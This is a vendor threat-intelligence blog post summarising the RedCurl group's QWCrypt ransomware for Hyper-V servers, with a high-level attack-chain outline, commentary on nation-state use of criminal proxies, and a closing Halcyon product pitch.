Threat Actor RedCurl Develops Ransomware to Encrypt Hyper-V Servers

RedCurl, a threat actor active since 2018 and known for stealthy corporate espionage, has begun deploying ransomware in addition to its traditional data exfiltration methods.  

Researchers recently observed RedCurl using a ransomware variant called QWCrypt, designed to target virtual machines hosted on Microsoft Hyper-V, Bleeping Computer reports.

While most ransomware operations focus on VMware ESXi, QWCrypt marks a shift in targeting strategy. In a notable case, RedCurl deviated from its usual pattern by encrypting data rather than solely exfiltrating it.

The attack chain typically begins with phishing emails containing ".IMG" attachments masquerading as CVs. These files contain a malicious screensaver vulnerable to DLL sideloading, which downloads a payload and maintains persistence via scheduled tasks.  

RedCurl uses stealthy, "living-off-the-land" tools, a custom wmiexec variant for lateral movement, and the tool Chisel for tunneling and RDP access.

To disable defenses before encryption, the attackers deploy encrypted 7z archives and multi-stage PowerShell scripts. QWCrypt supports various command-line arguments, such as --excludeVM to avoid disrupting key systems, and uses the XChaCha20-Poly1305 encryption algorithm.

It also supports selective or intermittent encryption for speed. The ransom note includes text from other known ransomware families, but the absence of a leak site suggests the motive behind encryption remains unclear.

Takeaway: RedCurl’s pivot to ransomware is yet another example of the growing convergence between cybercriminal operations and nation-state interests—a trend we’ve been warning about for years.  

Researchers have laid out two key theories here. One is that RedCurl acts as contractors, taking jobs from whoever’s paying—corporate espionage, data theft, ransomware, you name it. The other is that they’re just enriching themselves quietly, skipping the splashy ransom notes and leak sites in favor of under-the-radar negotiations.

But here’s the real takeaway: we’re seeing the weaponization of criminal groups by adversarial nation-states so they can maintain plausible deniability, where the threat actors are being used as proxies to further geopolitical ambitions.  

Ransomware isn’t just about money anymore—it’s also an important tool in a broader nation-state playbook. It creates chaos, ties up resources, and lets hostile governments test boundaries without leaving fingerprints.

The problem? Attribution is hard. That ambiguity ties the hands of Western governments and delays meaningful response. Meanwhile, these groups operate with impunity, often under the protection—or at the direction—of regimes that are more than happy to let them wreak havoc on foreign networks.

Until there's real accountability, including direct consequences for the governments providing safe haven for these threat actors, this cycle will only get worse. And make no mistake—something big will eventually break.

Halcyon.ai eliminates the business impact of ransomware. Modern enterprises rely on Halcyon to prevent ransomware attacks, eradicating cybercriminals’ ability to encrypt systems, steal data, and extort companies – talk to a Halcyon expert today to find out more, and check out our quarterly RaaS and extortion group reference guide, Power Rankings: Ransomware Malicious Quartile.